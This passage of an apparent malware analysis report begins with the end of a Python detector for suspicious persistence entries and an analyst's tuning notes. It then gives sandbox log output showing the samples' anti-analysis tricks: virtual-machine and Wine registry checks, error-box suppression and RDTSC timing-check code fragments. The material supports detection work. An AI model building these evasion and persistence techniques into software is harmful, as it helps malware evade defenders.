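    ("Scheduled task", "MPGPH131 HR", schtasks_target(SCHTASKS_CMDLINE) or ""),
    # constructed benign controls: a per-user vendor install and a system binary via %windir%
    ("HKCU Run", "OneDrive", '"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'),
    ("HKLM Run", "SecurityHealth", "%windir%\\system32\\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for mechanism, name, path, folder in classify(SAMPLE_ENTRIES):
        print(f"{mechanism:<15} {name:<16} -> {path}   (matched {folder})")
```

The four malicious records are reported and the two controls are not. The allowlist is there because \AppData\Local\ is also where legitimate per-user installers live; without it the check drowns in false positives, with it anything dropped under \AppData\Local\Microsoft\ slips past, so treat it as a tuning knob rather than a guarantee. The .job file at C:\Windows\Tasks\explorha.job is a Task Scheduler 1.0 artifact whose action is not shown in the report; on a live host it would be parsed and fed in as one more entry, and task actions that run through rundll32 or powershell need the wrapped argument extracted before the folder test is applied.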

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E2072B second address: E2072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E2072F second address: E20761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0EA9AC3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A2A second address: E37A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FD5730h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A40 second address: E37A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A45 second address: E37A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F17B0FD5726h 0x00000013 jmp 00007F17B0FD572Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A67 second address: E37A71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37A71 second address: E37A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0FD5726h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37BE4 second address: E37BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F17B0EA9ABFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37BFD second address: E37C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37C03 second address: E37C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37C07 second address: E37C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E37C0B second address: E37C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ABC2 second address: E3ABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ABC6 second address: E3AC2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 call 00007F17B0EA9AB9h 0x0000000e push ebx 0x0000000f jbe 00007F17B0EA9ABCh 0x00000015 pop ebx 0x00000016 push eax 0x00000017 jmp 00007F17B0EA9AC7h 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007F17B0EA9AC8h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 jnl 00007F17B0EA9ABCh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AC2A second address: E3ACB5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0FD573Dh 0x00000008 jmp 00007F17B0FD5737h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007F17B0FD572Eh 0x00000018 pop eax 0x00000019 or dword ptr [ebp+122D1DA7h], edi 0x0000001f push 00000003h 0x00000021 push eax 0x00000022 jmp 00007F17B0FD5737h 0x00000027 pop edi 0x00000028 push 00000000h 0x0000002a jnp 00007F17B0FD572Ch 0x00000030 mov dword ptr [ebp+122D1DA7h], ebx 0x00000036 push 00000003h 0x00000038 mov esi, dword ptr [ebp+122D2C57h] 0x0000003e push B6CFDD2Eh 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F17B0FD5738h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ACB5 second address: E3ACB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3ACB9 second address: E3ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 093022D2h 0x0000000e mov edi, dword ptr [ebp+122D2CE3h] 0x00000014 lea ebx, dword ptr [ebp+1245FA66h] 0x0000001a push eax 0x0000001b pushad 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AD5B second address: E3AD61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AD61 second address: E3AD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AE7D second address: E3AEBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F17B0EA9AB6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2A88h], esi 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2AB6h], eax 0x0000001b mov ecx, dword ptr [ebp+122D2E7Bh] 0x00000021 push B40C15AEh 0x00000026 pushad 0x00000027 jng 00007F17B0EA9AC2h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AEBA second address: E3AF21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4BF3EAD2h 0x0000000e mov cl, 0Eh 0x00000010 push 00000003h 0x00000012 mov ecx, esi 0x00000014 push 00000000h 0x00000016 mov ecx, dword ptr [ebp+122D2CD3h] 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F17B0FD5728h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 je 00007F17B0FD5728h 0x0000003e mov cl, dh 0x00000040 call 00007F17B0FD5729h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F17B0FD5737h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AF21 second address: E3AF2B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F17B0EA9AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AF2B second address: E3AF9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jns 00007F17B0FD5726h 0x00000011 pop eax 0x00000012 jl 00007F17B0FD5728h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 push esi 0x00000021 jno 00007F17B0FD5726h 0x00000027 pop esi 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b pop edx 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f pushad 0x00000030 pushad 0x00000031 js 00007F17B0FD5726h 0x00000037 jmp 00007F17B0FD5730h 0x0000003c popad 0x0000003d jmp 00007F17B0FD572Ah 0x00000042 popad 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jmp 00007F17B0FD5731h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 push edx 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E3AF9C second address: E3B012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F17B0EA9AB8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 lea ebx, dword ptr [ebp+1245FA7Ah] 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F17B0EA9AB8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 xor dword ptr [ebp+122D1D9Ah], ecx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c jmp 00007F17B0EA9AC5h 0x00000051 pop edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C60F second address: E4C615 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C615 second address: E4C634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F17B0EA9AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F17B0EA9ABCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C634 second address: E4C638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4C638 second address: E4C63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AA07 second address: E5AA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AA12 second address: E5AA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AD1C second address: E5AD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 js 00007F17B0FD5726h 0x0000000c jne 00007F17B0FD5726h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AD31 second address: E5AD38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AFB6 second address: E5AFC0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0FD5726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5AFC0 second address: E5AFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5B155 second address: E5B159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C07D second address: E5C0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9AC3h 0x00000009 push eax 0x0000000a jmp 00007F17B0EA9ABEh 0x0000000f pop eax 0x00000010 pop esi 0x00000011 jng 00007F17B0EA9AD4h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007F17B0EA9AB6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C0B3 second address: E5C0C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C1F7 second address: E5C1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C1FB second address: E5C1FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C1FF second address: E5C20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F17B0EA9AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C20B second address: E5C212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C3F0 second address: E5C3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5C7A8 second address: E5C7AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5F445 second address: E5F449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5FABD second address: E5FAE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17B0FD572Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E5FAE6 second address: E5FB3E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F17B0EA9AC8h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 push edx 0x00000012 jmp 00007F17B0EA9AC4h 0x00000017 pop edx 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e js 00007F17B0EA9AB8h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17B0EA9ABEh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E684EE second address: E684F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E684F2 second address: E684F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E684F6 second address: E684FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E2222D second address: E22233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E22233 second address: E22237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E22237 second address: E22266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F17B0EA9AC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6798D second address: E67991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E67C42 second address: E67C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E67C48 second address: E67C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FD572Fh 0x00000009 pop esi 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F17B0FD572Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F17B0FD5726h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E67C79 second address: E67C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E68073 second address: E680AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F17B0FD5726h 0x0000000a jmp 00007F17B0FD5735h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F17B0FD5736h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E680AE second address: E680B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E681E8 second address: E681F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F17B0FD5732h 0x00000008 jg 00007F17B0FD5726h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6832F second address: E68348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F17B0EA9ABFh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E68CCD second address: E68CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E690B2 second address: E690C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69383 second address: E69387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E69387 second address: E6938D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E699E1 second address: E699E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E699E5 second address: E69A0C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F17B0EA9AC6h 0x00000008 jmp 00007F17B0EA9AC0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jbe 00007F17B0EA9AB6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
